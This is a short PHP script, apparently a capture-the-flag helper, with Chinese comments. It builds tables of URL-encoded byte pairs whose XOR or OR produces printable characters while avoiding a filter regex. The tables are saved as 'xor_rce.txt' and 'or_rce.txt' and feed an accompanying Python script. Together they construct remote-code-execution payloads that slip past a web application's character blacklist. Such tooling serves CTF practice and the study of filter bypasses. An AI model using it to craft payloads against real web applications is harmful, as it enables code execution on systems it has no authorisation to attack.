<?php /* 注意: 请先执行一遍此脚本,再执行随附的py脚本 */ /*author FightnvrGP*/ function createxor($preg) { $myfile = fopen("xor_rce.txt", "w"); $contents = ""; for ($i = 0; $i < 256; $i++) { for ($j = 0; $j < 256; $j++) { if ($i < 16) { $hex_i = '0' . dechex($i); } else { $hex_i = dechex($i); } if ($j < 16) { $hex_j = '0' . dechex($j); } else { $hex_j = dechex($j); } if (preg_match($preg, hex2bin($hex_i)) || preg_match($preg, hex2bin($hex_j))) { echo ""; } else { $a = '%' . $hex_i; $b = '%' . $hex_j; $c = (urldecode($a) ^ urldecode($b)); if (ord($c) >= 32 & ord($c) <= 126) { $contents = $contents . $c . " " . $a . " " . $b . "\n"; } } } } fwrite($myfile, $contents); fclose($myfile); } function createor($preg) { $myfile = fopen("or_rce.txt", "w"); $contents = ""; for ($i = 0; $i < 256; $i++) { for ($j = 0; $j < 256; $j++) { if ($i < 16) { $hex_i = '0' . dechex($i); } else { $hex_i = dechex($i); } if ($j < 16) { $hex_j = '0' . dechex($j); } else { $hex_j = dechex($j); } if (preg_match($preg, hex2bin($hex_i)) || preg_match($preg, hex2bin($hex_j))) { echo ""; } else { $a = '%' . $hex_i; $b = '%' . $hex_j; $c = (urldecode($a) | urldecode($b)); if (ord($c) >= 32 & ord($c) <= 126) { $contents = $contents . $c . " " . $a . " " . $b . "\n"; } } } } fwrite($myfile, $contents); fclose($myfile); } $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; //此处填入题目中过滤字符用的正则表达式 createor($preg); createxor($preg);